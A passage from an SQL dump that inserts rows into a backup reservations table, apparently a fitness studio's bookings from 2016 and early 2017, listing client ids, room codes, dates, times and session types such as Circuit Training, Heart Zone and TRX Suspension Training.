(7145, 193, 'CTR', '2016-06-08', '19h ', '19h30', 'Circuit training'),
(7112, 205, 'CTR', '2016-05-25', '19h ', '19h30', 'Circuit training'),
(7113, 80, 'CTR', '2016-05-25', '19h ', '19h30', 'Circuit training'),
(7114, 80, 'CTR', '2016-05-25', '19h ', '19h30', 'Circuit training'),
(7115, 90, 'CTR', '2016-05-23', '19h15', '19h45', 'Heart Zone 2 Partie 1'),
(7144, 193, 'CTR', '2016-06-08', '18h15', '18h45', 'Circuit Training'),
(7117, 240, 'CTR', '2016-05-23', '17h30', '18h00', 'TRX Suspension Training'),
(7118, 240, 'CTR', '2016-05-26', '18h15', '18h45', 'Circuit Training'),
(7124, 240, 'CTR', '2016-05-28', '11h40', '12h10', 'Circuit Niveau 3'),
(7120, 237, 'CTR', '2016-05-23', '17h30', '18h00', 'TRX Suspension Training'),
(7121, 237, 'CTR', '2016-05-24', '19h45', '20h30', 'Circuit Training'),
(7122, 237, 'CTR', '2016-05-26', '18h15', '18h45', 'Circuit Training'),
(7232, 192, 'CTR', '2016-05-28', '10h30', '11h00', 'Circuit Niveau 1'),
(7125, 193, 'CTR', '2016-06-01', '18h15', '18h45', 'Circuit Training'),
(7126, 193, 'CTR', '2016-06-01', '19h ', '19h30', 'Circuit training'),
(7127, 238, 'CTR', '2016-05-23', '17h30', '18h00', 'TRX Suspension Training'),
(7128, 238, 'CTR', '2016-05-24', '19h45', '20h30', 'Circuit Training'),
(7129, 238, 'CTR', '2016-05-26', '18h15', '18h45', 'Circuit Training'),
(7130, 210, 'CTR', '2016-05-23', '17h30', '18h00', 'TRX Suspension Training'),
(7131, 218, 'CTR', '2016-05-23', '17h30', '18h00', 'TRX Suspension Training'),
(7132, 218, 'CTR', '2016-05-26', '18h15', '18h45', 'Circuit Training'),
(7133, 80, 'CTR', '2016-05-23', '18h15', '18h45', 'Heart Zone partie 1'),
(7134, 80, 'CTR', '2016-05-23', '18h45', '19h15', 'Heart Zone partie 2'),
(7135, 239, 'CTR', '2016-05-26', '18h15', '18h45', 'Circuit Training'),
(7136, 56, 'CTR', '2016-05-23', '18h15', '18h45', 'Heart Zone partie 1'),
(7137, 56, 'CTR', '2016-05-23', '18h45', '19h15', 'Heart Zone partie 2'),
(7138, 239, 'CTR', '2016-05-23', '17h30', '18h00', 'TRX Suspension Training'),
(7139, 48, 'CTR', '2016-05-24', '19h45', '20h30', 'Circuit Training'),
(7146, 238, 'CTR', '2016-05-30', '17h30', '18h00', 'TRX Suspension Training'),
(7147, 238, 'CTR', '2016-05-31', '19h45', '20h30', 'Circuit Training'),
(7184, 48, 'CTR', '2016-06-01', '18h15', '18h45', 'Circuit Training'),
(7149, 238, 'CTR', '2016-06-02', '18h15', '18h45', 'Circuit Training'),
(7151, 210, 'CTR', '2016-05-28', '11h05', '11h35', 'Circuit Niveau 2'),
(7152, 205, 'CTR', '2016-05-25', '18h15', '18h45', 'Circuit Training'),
(7153, 235, 'CTR', '2016-05-30', '18h15', '18h45', 'Heart Zone partie 1'),
(7154, 235, 'CTR', '2016-06-04', '11h05', '11h35', 'Circuit Niveau 2'),
(7237, 132, 'CTR', '2016-06-04', '11h40', '12h10', 'Circuit Niveau 3'),
(7160, 44, 'CTR', '2016-05-28', '10h30', '11h00', 'Circuit Niveau 1'),
(7159, 44, 'CTR', '2016-05-26', '18h15', '18h45', 'Circuit Training'),
(7161, 230, 'CTR', '2016-06-08', '18h15', '18h45', 'Circuit Training'),
(7162, 230, 'CTR', '2016-06-08', '19h ', '19h30', 'Circuit training'),
(7185, 228, 'CTR', '2016-06-01', '19h ', '19h30', 'Circuit training'),
(7164, 230, 'CTR', '2016-06-01', '19h ', '19h30', 'Circuit training'),
(7165, 118, 'CTR', '2016-05-26', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(7166, 147, 'CTR', '2016-05-26', '18h15', '18h45', 'Circuit Training'),
(7167, 175, 'CTR', '2016-05-26', '18h15', '18h45', 'Circuit Training'),
(7168, 126, 'CTR', '2016-05-26', '18h15', '18h45', 'Circuit Training'),
(7169, 209, 'CTR', '2016-05-26', '19h00', '19h30', 'Personal Training'),
(7170, 232, 'CTR', '2016-05-28', '11h05', '11h35', 'Circuit Niveau 2'),
(7171, 232, 'CTR', '2016-05-28', '11h40', '12h10', 'Circuit Niveau 3'),
(7172, 233, 'CTR', '2016-05-28', '11h05', '11h35', 'Circuit Niveau 2'),
(7173, 233, 'CTR', '2016-05-28', '11h40', '12h10', 'Circuit Niveau 3'),
(7174, 199, 'CTR', '2016-05-30', '17h30', '18h00', 'TRX Suspension Training'),
(7175, 231, 'CTR', '2016-06-01', '18h15', '18h45', 'Circuit Training'),
(7177, 237, 'CTR', '2016-06-01', '18h15', '18h45', 'Circuit Training'),
(7178, 228, 'CTR', '2016-06-01', '18h15', '18h45', 'Circuit Training'),
(7179, 205, 'CTR', '2016-06-01', '18h15', '18h45', 'Circuit Training'),
(7180, 240, 'CTR', '2016-06-01', '18h15', '18h45', 'Circuit Training'),
(7181, 238, 'CTR', '2016-06-01', '18h15', '18h45', 'Circuit Training'),
(7182, 31, 'CTR', '2016-06-01', '18h15', '18h45', 'Circuit Training'),
(7183, 195, 'CTR', '2016-06-01', '18h15', '18h45', 'Circuit Training'),
(7186, 31, 'CTR', '2016-06-01', '19h ', '19h30', 'Circuit training'),
(7187, 48, 'CTR', '2016-06-01', '19h ', '19h30', 'Circuit training'),
(7362, 26, 'CTR', '2016-06-08', '19h45', '20h15', 'Circuit Training'),
(7308, 209, 'CTR', '2016-06-02', '19h00', '19h30', 'Personal Training'),
(7190, 205, 'CTR', '2016-06-01', '19h ', '19h30', 'Circuit training'),
(7191, 168, 'CTR', '2016-06-01', '19h ', '19h30', 'Circuit training'),
(7192, 126, 'CTR', '2016-06-01', '19h45', '20h15', 'Circuit Training'),
(7193, 241, 'CTR', '2016-06-01', '19h45', '20h15', 'Circuit Training'),
(7194, 147, 'CTR', '2016-06-01', '19h45', '20h15', 'Circuit Training'),
(7195, 90, 'CTR', '2016-06-01', '19h45', '20h15', 'Circuit Training'),
(7198, 132, 'CTR', '2016-06-01', '20h30', '21h', 'Circuit Training'),
(7197, 204, 'CTR', '2016-06-01', '20h30', '21h', 'Circuit Training'),
(7199, 188, 'CTR', '2016-06-01', '20h30', '21h', 'Circuit Training'),
(7200, 188, 'CTR', '2016-06-01', '20h30', '21h', 'Circuit Training'),
(7201, 188, 'CTR', '2016-06-01', '20h30', '21h', 'Circuit Training'),
(7202, 233, 'CTR', '2016-06-01', '20h30', '21h', 'Circuit Training'),
(7203, 173, 'CTR', '2016-06-01', '20h30', '21h', 'Circuit Training'),
(7204, 60, 'CTR', '2016-06-01', '20h30', '21h', 'Circuit Training'),
(7205, 180, 'CTR', '2016-06-01', '20h30', '21h', 'Circuit Training'),
(7206, 196, 'CTR', '2016-06-01', '20h30', '21h', 'Circuit Training'),
(7207, 132, 'CTR', '2016-05-30', '19h15', '19h45', 'Heart Zone 2 Partie 1'),
(7208, 132, 'CTR', '2016-05-30', '19h45', '20h15', 'Heart Zone 2 Partie 2'),
(7209, 48, 'CTR', '2016-05-28', '10h30', '11h00', 'Circuit Niveau 1'),
(7210, 48, 'CTR', '2016-05-28', '11h05', '11h35', 'Circuit Niveau 2'),
(7247, 210, 'CTR', '2016-05-30', '18h15', '18h45', 'Heart Zone partie 1'),
(7212, 90, 'CTR', '2016-05-26', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(7213, 189, 'CTR', '2016-05-26', '12h00', '12h30', 'Circuit training'),
(7214, 205, 'CTR', '2016-05-26', '12h00', '12h30', 'Circuit training'),
(7215, 224, 'CTR', '2016-05-26', '12h00', '12h30', 'Circuit training'),
(7216, 240, 'CTR', '2016-05-30', '17h30', '18h00', 'TRX Suspension Training'),
(7217, 237, 'CTR', '2016-05-30', '17h30', '18h00', 'TRX Suspension Training'),
(7218, 28, 'CTR', '2016-05-30', '17h30', '18h00', 'TRX Suspension Training'),
(7219, 205, 'CTR', '2016-05-30', '17h30', '18h00', 'TRX Suspension Training'),
(7220, 239, 'CTR', '2016-05-30', '17h30', '18h00', 'TRX Suspension Training'),
(7221, 56, 'CTR', '2016-05-30', '18h15', '18h45', 'Heart Zone partie 1'),
(7222, 56, 'CTR', '2016-05-30', '18h45', '19h15', 'Heart Zone partie 2'),
(7223, 205, 'CTR', '2016-05-30', '18h15', '18h45', 'Heart Zone partie 1'),
(7224, 205, 'CTR', '2016-05-30', '18h45', '19h15', 'Heart Zone partie 2'),
(7225, 50, 'CTR', '2016-05-30', '18h15', '18h45', 'Heart Zone partie 1'),
(7226, 50, 'CTR', '2016-05-30', '18h45', '19h15', 'Heart Zone partie 2'),
(7227, 53, 'CTR', '2016-05-30', '18h15', '18h45', 'Heart Zone partie 1'),
(7228, 53, 'CTR', '2016-05-30', '18h45', '19h15', 'Heart Zone partie 2'),
(7239, 240, 'CTR', '2016-06-02', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(7238, 240, 'CTR', '2016-05-31', '19h45', '20h30', 'Circuit Training'),
(7231, 238, 'CTR', '2016-05-28', '11h40', '12h10', 'Circuit Niveau 3'),
(7233, 192, 'CTR', '2016-05-28', '11h05', '11h35', 'Circuit Niveau 2'),
(7234, 126, 'CTR', '2016-05-28', '11h05', '11h35', 'Circuit Niveau 2'),
(7235, 126, 'CTR', '2016-05-28', '11h40', '12h10', 'Circuit Niveau 3'),
(7240, 240, 'CTR', '2016-06-04', '11h40', '12h10', 'Circuit Niveau 3'),
(7241, 213, 'CTR', '2016-05-29', '10h15', '10h45', 'Duo Training'),
(7242, 180, 'CTR', '2016-05-30', '18h15', '18h45', 'Heart Zone partie 1'),
(7243, 180, 'CTR', '2016-05-30', '18h45', '19h15', 'Heart Zone partie 2'),
(7244, 126, 'CTR', '2016-05-30', '19h15', '19h45', 'Heart Zone 2 Partie 1'),
(7245, 126, 'CTR', '2016-05-30', '19h45', '20h15', 'Heart Zone 2 Partie 2'),
(7246, 30, 'CTR', '2016-05-30', '17h30', '18h00', 'TRX Suspension Training'),
(7248, 210, 'CTR', '2016-05-30', '18h45', '19h15', 'Heart Zone partie 2'),
(7249, 237, 'CTR', '2016-05-31', '19h45', '20h30', 'Circuit Training'),
(7250, 235, 'CTR', '2016-05-30', '18h45', '19h15', 'Heart Zone partie 2'),
(7251, 80, 'CTR', '2016-05-30', '18h15', '18h45', 'Heart Zone partie 1'),
(7252, 80, 'CTR', '2016-05-30', '18h45', '19h15', 'Heart Zone partie 2'),
(7253, 230, 'CTR', '2016-05-30', '18h15', '18h45', 'Heart Zone partie 1'),
(7254, 230, 'CTR', '2016-05-30', '18h45', '19h15', 'Heart Zone partie 2'),
(7255, 147, 'CTR', '2016-05-30', '19h15', '19h45', 'Heart Zone 2 Partie 1'),
(7256, 147, 'CTR', '2016-05-30', '19h45', '20h15', 'Heart Zone 2 Partie 2'),
(7257, 241, 'CTR', '2016-05-30', '19h15', '19h45', 'Heart Zone 2 Partie 1'),
(7258, 241, 'CTR', '2016-05-30', '19h45', '20h15', 'Heart Zone 2 Partie 2'),
(7259, 210, 'CTR', '2016-06-01', '17h30', '18h', 'TRX Suspension Training'),
(7260, 210, 'CTR', '2016-06-02', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(7261, 213, 'CTR', '2016-06-05', '10h15', '10h45', 'Duo Training'),
(7263, 227, 'CTR', '2016-06-01', '19h ', '19h30', 'Circuit training'),
(7264, 242, 'CTR', '2016-06-01', '19h45', '20h15', 'Circuit Training'),
(7265, 177, 'CTR', '2016-06-01', '19h45', '20h15', 'Circuit Training'),
(7266, 237, 'CTR', '2016-06-02', '18h15', '18h45', 'Circuit Training'),
(7267, 237, 'CTR', '2016-06-04', '11h40', '12h10', 'Circuit Niveau 3'),
(7268, 168, 'CTR', '2016-06-02', '18h15', '18h45', 'Circuit Training'),
(7269, 193, 'CTR', '2016-06-13', '18h15', '18h45', 'Heart Zone partie 1'),
(7270, 193, 'CTR', '2016-06-13', '18h45', '19h15', 'Heart Zone partie 2'),
(7403, 193, 'CTR', '2016-06-27', '18h15', '18h45', 'Heart Zone partie 1'),
(7273, 31, 'CTR', '2016-06-04', '10h30', '11h00', 'Circuit Niveau 1'),
(7274, 31, 'CTR', '2016-06-04', '11h05', '11h35', 'Circuit Niveau 2'),
(7275, 118, 'CTR', '2016-06-02', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(7276, 233, 'CTR', '2016-06-04', '11h05', '11h35', 'Circuit Niveau 2'),
(7277, 233, 'CTR', '2016-06-04', '11h40', '12h10', 'Circuit Niveau 3'),
(7278, 205, 'CTR', '2016-06-08', '17h30', '18h', 'TRX Suspension Training'),
(7279, 48, 'CTR', '2016-06-08', '18h15', '18h45', 'Circuit Training'),
(7280, 31, 'CTR', '2016-06-08', '18h15', '18h45', 'Circuit Training'),
(7281, 195, 'CTR', '2016-06-08', '18h15', '18h45', 'Circuit Training'),
(7282, 240, 'CTR', '2016-06-08', '18h15', '18h45', 'Circuit Training'),
(7283, 231, 'CTR', '2016-06-08', '18h15', '18h45', 'Circuit Training'),
(7324, 237, 'CTR', '2016-06-06', '17h30', '18h00', 'TRX Suspension Training'),
(7285, 238, 'CTR', '2016-06-08', '18h15', '18h45', 'Circuit Training'),
(7286, 236, 'CTR', '2016-06-08', '18h15', '18h45', 'Circuit Training'),
(7287, 48, 'CTR', '2016-06-08', '19h ', '19h30', 'Circuit training'),
(7288, 31, 'CTR', '2016-06-08', '19h ', '19h30', 'Circuit training'),
(7359, 63, 'CTR', '2016-06-08', '17h30', '18h', 'TRX Suspension Training'),
(7290, 90, 'CTR', '2016-06-08', '19h45', '20h15', 'Circuit Training'),
(7291, 126, 'CTR', '2016-06-08', '19h45', '20h15', 'Circuit Training'),
(7294, 177, 'CTR', '2016-06-06', '19h15', '19h45', 'Heart Zone 2 Partie 1'),
(7293, 177, 'CTR', '2016-06-08', '19h45', '20h15', 'Circuit Training'),
(7353, 69, 'CTR', '2016-06-06', '18h45', '19h15', 'Heart Zone partie 2'),
(7296, 171, 'CTR', '2016-06-08', '19h ', '19h30', 'Circuit training'),
(7297, 164, 'CTR', '2016-06-08', '19h ', '19h30', 'Circuit training'),
(7298, 188, 'CTR', '2016-06-08', '20h30', '21h', 'Circuit Training'),
(7363, 90, 'CTR', '2016-06-09', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(7301, 204, 'CTR', '2016-06-08', '20h30', '21h', 'Circuit Training'),
(7302, 173, 'CTR', '2016-06-08', '20h30', '21h', 'Circuit Training'),
(7303, 60, 'CTR', '2016-06-08', '20h30', '21h', 'Circuit Training'),
(7304, 132, 'CTR', '2016-06-08', '20h30', '21h', 'Circuit Training'),
(7305, 196, 'CTR', '2016-06-08', '20h30', '21h', 'Circuit Training'),
(7306, 233, 'CTR', '2016-06-08', '20h30', '21h', 'Circuit Training'),
(7309, 189, 'CTR', '2016-06-02', '12h00', '12h30', 'Circuit training'),
(7310, 232, 'CTR', '2016-06-04', '11h05', '11h35', 'Circuit Niveau 2'),
(7311, 48, 'CTR', '2016-06-04', '10h30', '11h00', 'Circuit Niveau 1'),
(7312, 48, 'CTR', '2016-06-04', '11h05', '11h35', 'Circuit Niveau 2'),
(7313, 227, 'CTR', '2016-06-06', '18h15', '18h45', 'Heart Zone partie 1'),
(7314, 227, 'CTR', '2016-06-06', '18h45', '19h15', 'Heart Zone partie 2'),
(7315, 235, 'CTR', '2016-06-06', '18h15', '18h45', 'Heart Zone partie 1'),
(7374, 210, 'CTR', '2016-06-09', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(7317, 235, 'CTR', '2016-06-06', '18h45', '19h15', 'Heart Zone partie 2'),
(7320, 240, 'CTR', '2016-06-06', '17h30', '18h00', 'TRX Suspension Training'),
(7319, 240, 'CTR', '2016-06-07', '19h45', '20h30', 'Circuit Training'),
(7321, 240, 'CTR', '2016-06-09', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(7322, 48, 'CTR', '2016-06-06', '18h15', '18h45', 'Heart Zone partie 1'),
(7323, 48, 'CTR', '2016-06-06', '18h45', '19h15', 'Heart Zone partie 2'),
(7325, 237, 'CTR', '2016-06-07', '19h45', '20h30', 'Circuit Training'),
(7328, 126, 'CTR', '2016-06-06', '19h15', '19h45', 'Heart Zone 2 Partie 1'),
(7327, 213, 'CTR', '2016-06-07', '19h00', '19h30', 'Duo Training'),
(7329, 241, 'CTR', '2016-06-06', '19h15', '19h45', 'Heart Zone 2 Partie 1'),
(7330, 147, 'CTR', '2016-06-06', '19h15', '19h45', 'Heart Zone 2 Partie 1'),
(7352, 69, 'CTR', '2016-06-06', '18h15', '18h45', 'Heart Zone partie 1'),
(7333, 205, 'CTR', '2016-06-06', '18h15', '18h45', 'Heart Zone partie 1'),
(7334, 205, 'CTR', '2016-06-06', '18h45', '19h15', 'Heart Zone partie 2'),
(7335, 205, 'CTR', '2016-06-06', '17h30', '18h00', 'TRX Suspension Training'),
(7364, 90, 'CTR', '2016-06-09', '18h15', '18h45', 'Circuit Training'),
(7338, 238, 'CTR', '2016-06-06', '17h30', '18h00', 'TRX Suspension Training'),
(7339, 238, 'CTR', '2016-06-07', '19h45', '20h30', 'Circuit Training'),
(7340, 238, 'CTR', '2016-06-09', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(7341, 132, 'CTR', '2016-06-06', '19h15', '19h45', 'Heart Zone 2 Partie 1'),
(7342, 92, 'CTR', '2016-06-06', '19h15', '19h45', 'Heart Zone 2 Partie 1'),
(7343, 92, 'CTR', '2016-06-06', '19h45', '20h15', 'Heart Zone 2 Partie 2'),
(7344, 199, 'CTR', '2016-06-06', '17h30', '18h00', 'TRX Suspension Training'),
(7345, 28, 'CTR', '2016-06-06', '17h30', '18h00', 'TRX Suspension Training'),
(7346, 228, 'CTR', '2016-06-06', '18h15', '18h45', 'Heart Zone partie 1'),
(7347, 228, 'CTR', '2016-06-06', '18h45', '19h15', 'Heart Zone partie 2'),
(7348, 53, 'CTR', '2016-06-06', '18h15', '18h45', 'Heart Zone partie 1'),
(7349, 53, 'CTR', '2016-06-06', '18h45', '19h15', 'Heart Zone partie 2'),
(7350, 80, 'CTR', '2016-06-06', '18h15', '18h45', 'Heart Zone partie 1'),
(7351, 80, 'CTR', '2016-06-06', '18h45', '19h15', 'Heart Zone partie 2'),
(7354, 30, 'CTR', '2016-06-07', '19h45', '20h30', 'Circuit Training'),
(7355, 233, 'CTR', '2016-06-07', '19h45', '20h30', 'Circuit Training'),
(7356, 140, 'CTR', '2016-06-08', '17h30', '18h', 'TRX Suspension Training'),
(7483, 232, 'CTR', '2016-06-18', '11h05', '11h35', 'Circuit Niveau 2'),
(7358, 140, 'CTR', '2016-06-22', '18h15', '18h45', 'Circuit Training'),
(7360, 222, 'CTR', '2016-06-09', '18h15', '18h45', 'Circuit Training'),
(7361, 221, 'CTR', '2016-06-09', '18h15', '18h45', 'Circuit Training'),
(7365, 189, 'CTR', '2016-06-09', '12h00', '12h30', 'Circuit training'),
(7366, 188, 'CTR', '2016-06-09', '12h00', '12h30', 'Circuit training'),
(7367, 205, 'CTR', '2016-06-09', '12h00', '12h30', 'Circuit training'),
(7368, 235, 'CTR', '2016-06-13', '18h15', '18h45', 'Heart Zone partie 1'),
(7369, 235, 'CTR', '2016-06-13', '18h45', '19h15', 'Heart Zone partie 2'),
(7377, 230, 'CTR', '2016-06-13', '18h15', '18h45', 'Heart Zone partie 1'),
(7371, 235, 'CTR', '2016-06-09', '12h00', '12h30', 'Circuit training'),
(7372, 237, 'CTR', '2016-06-09', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(7373, 191, 'CTR', '2016-06-09', '18h15', '18h45', 'Circuit Training'),
(7375, 210, 'CTR', '2016-06-09', '18h15', '18h45', 'Circuit Training'),
(7399, 50, 'CTR', '2016-06-13', '18h15', '18h45', 'Heart Zone partie 1'),
(7379, 230, 'CTR', '2016-06-13', '18h45', '19h15', 'Heart Zone partie 2');
INSERT INTO `reservation_reservation_bck` (`id`, `id_client`, `id_salle`, `date`, `heure_deb`, `heure_fin`, `type_seance`) VALUES
(7380, 233, 'CTR', '2016-06-13', '19h15', '19h45', 'Heart Zone 2 Partie 1'),
(7482, 132, 'CTR', '2016-06-18', '11h40', '12h10', 'Circuit Niveau 3'),
(7382, 233, 'CTR', '2016-06-15', '20h30', '21h', 'Circuit Training'),
(7383, 240, 'CTR', '2016-06-13', '17h30', '18h00', 'TRX Suspension Training'),
(7481, 132, 'CTR', '2016-06-18', '11h05', '11h35', 'Circuit Niveau 2'),
(7385, 240, 'CTR', '2016-06-15', '18h15', '18h45', 'Circuit Training'),
(7386, 240, 'CTR', '2016-06-16', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(7531, 48, 'CTR', '2016-06-20', '18h15', '18h45', 'Heart Zone partie 1'),
(7388, 213, 'CTR', '2016-06-12', '10h15', '10h45', 'Duo Training'),
(7389, 213, 'CTR', '2016-06-19', '10h15', '10h45', 'Duo Training'),
(7390, 213, 'CTR', '2016-06-19', '10h15', '10h45', 'Duo Training'),
(7391, 237, 'CTR', '2016-06-13', '17h30', '18h00', 'TRX Suspension Training'),
(7448, 30, 'CTR', '2016-06-15', '19h45', '20h15', 'Circuit Training'),
(7393, 237, 'CTR', '2016-06-15', '18h15', '18h45', 'Circuit Training'),
(7394, 237, 'CTR', '2016-06-16', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(7395, 237, 'CTR', '2016-06-18', '11h40', '12h10', 'Circuit Niveau 3'),
(7396, 238, 'CTR', '2016-06-13', '17h30', '18h00', 'TRX Suspension Training'),
(7397, 238, 'CTR', '2016-06-15', '17h30', '18h', 'TRX Suspension Training'),
(7398, 238, 'CTR', '2016-06-18', '11h40', '12h10', 'Circuit Niveau 3'),
(7400, 50, 'CTR', '2016-06-13', '18h45', '19h15', 'Heart Zone partie 2'),
(7401, 53, 'CTR', '2016-06-13', '18h15', '18h45', 'Heart Zone partie 1'),
(7402, 53, 'CTR', '2016-06-13', '18h45', '19h15', 'Heart Zone partie 2'),
(7404, 193, 'CTR', '2016-06-27', '18h45', '19h15', 'Heart Zone partie 2'),
(7612, 53, 'CTR', '2016-06-29', '17h30', '18h', 'TRX Suspension Training'),
(7407, 138, 'CTR', '2016-06-13', '18h15', '18h45', 'Heart Zone partie 1'),
(7408, 138, 'CTR', '2016-06-13', '18h45', '19h15', 'Heart Zone partie 2'),
(7409, 92, 'CTR', '2016-06-13', '18h15', '18h45', 'Heart Zone partie 1'),
(7410, 92, 'CTR', '2016-06-13', '18h45', '19h15', 'Heart Zone partie 2'),
(7412, 205, 'CTR', '2016-06-13', '17h30', '18h00', 'TRX Suspension Training'),
(7413, 205, 'CTR', '2016-06-13', '18h15', '18h45', 'Heart Zone partie 1'),
(7414, 205, 'CTR', '2016-06-13', '18h45', '19h15', 'Heart Zone partie 2'),
(7449, 63, 'CTR', '2016-06-15', '17h30', '18h', 'TRX Suspension Training'),
(7416, 48, 'CTR', '2016-06-15', '18h15', '18h45', 'Circuit Training'),
(7417, 31, 'CTR', '2016-06-15', '18h15', '18h45', 'Circuit Training'),
(7453, 168, 'CTR', '2016-06-15', '19h ', '19h30', 'Circuit training'),
(7419, 230, 'CTR', '2016-06-15', '18h15', '18h45', 'Circuit Training'),
(7420, 195, 'CTR', '2016-06-15', '18h15', '18h45', 'Circuit Training'),
(7421, 236, 'CTR', '2016-06-15', '18h15', '18h45', 'Circuit Training'),
(7422, 231, 'CTR', '2016-06-15', '18h15', '18h45', 'Circuit Training'),
(7423, 48, 'CTR', '2016-06-15', '19h ', '19h30', 'Circuit training'),
(7424, 31, 'CTR', '2016-06-15', '19h ', '19h30', 'Circuit training'),
(7454, 238, 'CTR', '2016-06-20', '17h30', '18h00', 'TRX Suspension Training'),
(7426, 230, 'CTR', '2016-06-15', '19h ', '19h30', 'Circuit training'),
(7485, 233, 'CTR', '2016-06-18', '11h05', '11h35', 'Circuit Niveau 2'),
(7428, 171, 'CTR', '2016-06-15', '19h ', '19h30', 'Circuit training'),
(9005, 192, 'CTR', '2017-02-15', '18h15', '18h45', 'Circuit Training'),
(7430, 177, 'CTR', '2016-06-15', '19h45', '20h15', 'Circuit Training'),
(7536, 240, 'CTR', '2016-06-18', '11h40', '12h10', 'Circuit Niveau 3'),
(7432, 126, 'CTR', '2016-06-15', '19h45', '20h15', 'Circuit Training'),
(7433, 173, 'CTR', '2016-06-15', '20h30', '21h', 'Circuit Training'),
(7434, 60, 'CTR', '2016-06-15', '20h30', '21h', 'Circuit Training'),
(7435, 132, 'CTR', '2016-06-15', '20h30', '21h', 'Circuit Training'),
(7436, 204, 'CTR', '2016-06-15', '20h30', '21h', 'Circuit Training'),
(7437, 196, 'CTR', '2016-06-15', '20h30', '21h', 'Circuit Training'),
(7438, 188, 'CTR', '2016-06-15', '20h30', '21h', 'Circuit Training'),
(7439, 188, 'CTR', '2016-06-15', '20h30', '21h', 'Circuit Training'),
(7440, 177, 'CTR', '2016-06-13', '19h15', '19h45', 'Heart Zone 2 Partie 1'),
(9004, 193, 'CTR', '2017-02-15', '18h15', '18h45', 'Circuit Training'),
(7442, 132, 'CTR', '2016-06-13', '19h15', '19h45', 'Heart Zone 2 Partie 1'),
(7443, 126, 'CTR', '2016-06-13', '19h15', '19h45', 'Heart Zone 2 Partie 1'),
(7444, 168, 'CTR', '2016-06-13', '17h30', '18h00', 'TRX Suspension Training'),
(7450, 205, 'CTR', '2016-06-15', '19h ', '19h30', 'Circuit training'),
(7451, 205, 'CTR', '2016-06-15', '19h45', '20h15', 'Circuit Training'),
(7452, 232, 'CTR', '2016-06-15', '20h30', '21h', 'Circuit Training'),
(7542, 237, 'CTR', '2016-06-20', '17h30', '18h00', 'TRX Suspension Training'),
(7456, 240, 'CTR', '2016-06-20', '17h30', '18h00', 'TRX Suspension Training'),
(7554, 56, 'CTR', '2016-06-21', '19h45', '20h30', 'Circuit Training'),
(7458, 205, 'CTR', '2016-06-20', '17h30', '18h00', 'TRX Suspension Training'),
(7459, 205, 'CTR', '2016-06-20', '18h15', '18h45', 'Heart Zone partie 1'),
(7460, 205, 'CTR', '2016-06-20', '18h45', '19h15', 'Heart Zone partie 2'),
(7461, 230, 'CTR', '2016-06-20', '18h15', '18h45', 'Heart Zone partie 1'),
(7462, 230, 'CTR', '2016-06-20', '18h45', '19h15', 'Heart Zone partie 2'),
(7463, 50, 'CTR', '2016-06-20', '18h15', '18h45', 'Heart Zone partie 1'),
(7464, 50, 'CTR', '2016-06-20', '18h45', '19h15', 'Heart Zone partie 2'),
(7465, 53, 'CTR', '2016-06-20', '18h15', '18h45', 'Heart Zone partie 1'),
(7466, 53, 'CTR', '2016-06-20', '18h45', '19h15', 'Heart Zone partie 2'),
(7467, 138, 'CTR', '2016-06-20', '18h15', '18h45', 'Heart Zone partie 1'),
(7468, 138, 'CTR', '2016-06-20', '18h45', '19h15', 'Heart Zone partie 2'),
(7469, 92, 'CTR', '2016-06-20', '18h15', '18h45', 'Heart Zone partie 1'),
(7470, 92, 'CTR', '2016-06-20', '18h45', '19h15', 'Heart Zone partie 2'),
(7471, 126, 'CTR', '2016-06-20', '19h15', '19h45', 'Heart Zone 2 Partie 1'),
(7472, 126, 'CTR', '2016-06-20', '19h45', '20h15', 'Heart Zone 2 Partie 2'),
(8519, 213, 'CTR', '2016-12-06', '19h15', '19h45', 'Duo Training'),
(8521, 196, 'lim', '2016-12-09', '12h', '12h45', 'Mercredi oubli inscription'),
(7475, 132, 'CTR', '2016-06-20', '19h15', '19h45', 'Heart Zone 2 Partie 1'),
(7476, 132, 'CTR', '2016-06-20', '19h45', '20h15', 'Heart Zone 2 Partie 2'),
(7477, 233, 'CTR', '2016-06-20', '19h15', '19h45', 'Heart Zone 2 Partie 1'),
(7478, 233, 'CTR', '2016-06-20', '19h45', '20h15', 'Heart Zone 2 Partie 2'),
(7479, 177, 'CTR', '2016-06-20', '19h15', '19h45', 'Heart Zone 2 Partie 1'),
(7480, 177, 'CTR', '2016-06-20', '19h45', '20h15', 'Heart Zone 2 Partie 2'),
(7533, 205, 'CTR', '2016-06-18', '11h05', '11h35', 'Circuit Niveau 2'),
(7488, 240, 'CTR', '2016-06-22', '18h15', '18h45', 'Circuit Training'),
(7489, 237, 'CTR', '2016-06-22', '18h15', '18h45', 'Circuit Training'),
(7490, 238, 'CTR', '2016-06-22', '18h15', '18h45', 'Circuit Training'),
(7491, 236, 'CTR', '2016-06-22', '18h15', '18h45', 'Circuit Training'),
(7492, 195, 'CTR', '2016-06-22', '18h15', '18h45', 'Circuit Training'),
(7493, 230, 'CTR', '2016-06-22', '18h15', '18h45', 'Circuit Training'),
(7494, 48, 'CTR', '2016-06-22', '18h15', '18h45', 'Circuit Training'),
(7495, 31, 'CTR', '2016-06-22', '18h15', '18h45', 'Circuit Training'),
(7497, 171, 'CTR', '2016-06-22', '19h ', '19h30', 'Circuit training'),
(7498, 164, 'CTR', '2016-06-22', '19h ', '19h30', 'Circuit training'),
(7499, 230, 'CTR', '2016-06-22', '19h ', '19h30', 'Circuit training'),
(7500, 31, 'CTR', '2016-06-22', '19h ', '19h30', 'Circuit training'),
(7501, 48, 'CTR', '2016-06-22', '19h ', '19h30', 'Circuit training'),
(7505, 205, 'CTR', '2016-06-22', '19h45', '20h15', 'Circuit Training'),
(7503, 205, 'CTR', '2016-06-22', '19h ', '19h30', 'Circuit training'),
(7555, 63, 'CTR', '2016-06-22', '17h30', '18h', 'TRX Suspension Training'),
